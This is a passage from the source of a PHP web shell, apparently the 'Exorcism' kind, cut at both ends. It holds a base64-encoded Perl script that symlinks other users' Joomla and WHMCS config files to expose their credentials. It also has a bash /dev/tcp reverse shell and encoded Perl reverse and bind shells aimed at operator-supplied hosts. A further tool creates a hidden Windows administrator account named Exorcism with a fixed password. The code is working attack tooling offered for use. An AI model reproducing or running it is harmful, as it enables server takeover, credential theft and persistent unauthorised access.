L25ldy9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvV0hNQ1Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC93aG1jczEvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XaG1jcy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3dobWNzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd2htY3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XSE1DL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvV2htYy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3dobWMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XSE0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XaG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC93aG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9IT1NUL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvSG9zdC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2hvc3Qvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9TVVBQT1JURVMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9TdXBwb3J0ZXMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zdXBwb3J0ZXMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9kb21haW5zL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvZG9tYWluL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvSG9zdGluZy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0hPU1RJTkcvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0FSVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NhcnQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jYXJ0L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvT1JERVIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9PcmRlci9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL29yZGVyL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0xJRU5UL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ2xpZW50L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0xJRU5UQVJFQS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NsaWVudGFyZWEvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jbGllbnRhcmVhL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvU1VQUE9SVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1N1cHBvcnQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQklMTElORy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JpbGxpbmcvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQlVZL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQnV5L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYnV5L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvTUFOQUdFL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvTWFuYWdlL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbWFuYWdlL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0xJRU5UU1VQUE9SVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NsaWVudFN1cHBvcnQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9DbGllbnRzdXBwb3J0L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NIRUNLT1VUL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ2hlY2tvdXQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jaGVja291dC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JJTExJTkdTL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQmlsbGluZ3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9iaWxsaW5ncy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JBU0tFVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0Jhc2tldC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2Jhc2tldC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1NFQ1VSRS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1NlY3VyZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3NlY3VyZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1NBTEVTL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvU2FsZXMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zYWxlcy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JJTEwvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9CaWxsL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYmlsbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1BVUkNIQVNFL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvUHVyY2hhc2Uvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9wdXJjaGFzZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0FDQ09VTlQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9BY2NvdW50L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYWNjb3VudC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1VTRVIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9Vc2VyL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdXNlci9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NMSUVOVFMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9DbGllbnRzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50cy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JJTExJTkdTL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQmlsbGluZ3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9iaWxsaW5ncy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL01ZL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvTXkvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9teS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9wYW5lbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NsaWVudGVzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50ZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3N1cHBvcnQvb3JkZXIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9DQopOw0KZm9yZWFjaCAoQGFycmF5KXsNCglteSAkY29uZmlnbnlhID0gJF8tPntjb25maWdkaXJ9Ow0KCW15ICR0eXBlY29uZmlnID0gJF8tPnt0eXBlfTsNCglzeW1saW5rKCIkY29uZmlnbnlhIiwiaWR4X3N5bS8kdXNlcm55YS0kdHlwZWNvbmZpZy50eHQiKTsNCglta2RpciAiaWR4X3N5bS8kdXNlcm55YS0kdHlwZWNvbmZpZy50eHQiOw0KCXN5bWxpbmsoIiRjb25maWdueWEiLCJpZHhfc3ltLyR1c2VybnlhLSR0eXBlY29uZmlnLnR4dC8weDE5OTkudHh0Iik7DQoJY29weSgiaWR4X3N5bS9uZW11LnR4dCIsImlkeF9zeW0vJHVzZXJueWEtJHR5cGVjb25maWcudHh0Ly5odGFjY2VzcyIpIDsNCgl9DQp9DQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50ICI8aGVhZD48dGl0bGU+QnlwYXNzIDQwNCBCeSAweDE5OTk8L3RpdGxlPjwvaGVhZD4iOw0KcHJpbnQgJzxtZXRhIGh0dHAtZXF1aXY9InJlZnJlc2giIGNvbnRlbnQ9IjU7IHVybD1pZHhfc3ltIi8+JzsNCnByaW50ICc8Ym9keT48Y2VudGVyPjxoMT4weDE5OTkgTmV2ZXIgRGllPC9oMT4nOw0KcHJpbnQgJzxhIGhyZWY9ImlkeF9zeW0iPktsaWsgRGlzaW5pPC9hPic7DQp1bmxpbmsoJDApOw==";
1040 save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
1041 exe("perl /tmp/symlink.pl");
1042 sleep(1);
1043 @unlink("/tmp/symlink.pl");
1044 @unlink("passwd.txt");
1045 @unlink("idx_sym/pas.txt");
1046 @unlink("idx_sym/nemu.txt");
1047 }
1048
1049 print "<div style='background: #ffffff; width: 100%; height: 100%'>";
1050 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_sym/' frameborder='0' scrolling='yes'></iframe>";
1051 print "</div>";
1052 }
1053 elseif($toolsname === "network") {
1054 $args = explode(" ", $args);
1055
1056 if($args[0] === "bc") {
1057 if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
1058 if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
1059 if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
1060
1061 if($args[3] === "bash") {
1062 exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
1063 }
1064 elseif($args[3] === "perl") {
1065 $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1066 save("/tmp/bc.pl", "w", base64_decode($bc['code']));
1067 $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
1068 sleep(1);
1069 print "<pre>".$bc['exec']."\n".exe("ps aux | grep bc.pl")."</pre>";
1070 @unlink("/tmp/bc.pl");
1071 }
1072 }
1073 elseif($args[0] === "bp") {
1074 if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
1075 if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
1076
1077 if($args[2] === "perl") {
1078 $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1079 save("/tmp/bp.pl", "w", base64_decode($bp['code']));
1080 $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
1081 sleep(1);
1082 print "<pre>".$bp['exec']."\n".exe("ps aux | grep bp.pl")."</pre>";
1083 @unlink("/tmp/bp.pl");
1084 }
1085 }
1086 else {
1087 print color(1, 1, "Unknown '".$args[0]."'");
1088 }
1089 }
1090 elseif($toolsname === "krdp") {
1091 $args = explode(" ", $args);
1092
1093 if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
1094 if(preg_match("/Exorcism/", exe("net user"))) die(color(1, 1, "[INFO] username 'Exorcism' already exists."));
1095
1096 $add_user = exe("net user Exorcism Exorcism /add");
1097 $add_groups1 = exe("net localgroup Administrators Exorcism /add");
1098 $add_groups2 = exe("net localgroup Administrator Exorcism /add");
1099 $add_groups3 = exe("net localgroup Administrateur Exorcism /add");
1100
1101 print "[ RDP ACCOUNT INFO ]<br>
1102 ------------------------------<br>
1103 IP: ".color(1, 2, $GLOBALS['SERVERIP'])."<br>
1104 Username: ".color(1, 2, "Exorcism")."<br>
1105 Password: ".color(1, 2, "Exorcism")."<br>
1106 ------------------------------<br><br>
1107 [ STATUS ]<br>
1108 ------------------------------<br>
1109 ";
1110
1111 if($add_user) {
1112 print "[add user] -> ".color(1, 2, "SUCCESS")."<br>";
1113 }
1114 else {
1115 print "[add user] -> ".color(1, 1, "FAILED")."<br>";
1116 }
1117
1118 if($add_groups1) {
1119 print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";
1120 }
1121 elseif($add_groups2) {
1122 print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";
1123 }
1124 elseif($add_groups3) {
1125 print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";
1126 }
1127 else {
1128 print "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";
1129 }
1130
1131 print "------------------------------<br>";
1132 }
1133}
1134
1135function files_and_folder() {
1136 if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
1137 if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
1138 print '<table width="100%" class="content" border="0" cellpadding="5" cellspacing="1" align="center">
1139 <tr>
1140 <th class="th_home"><center>Nama</center></th>
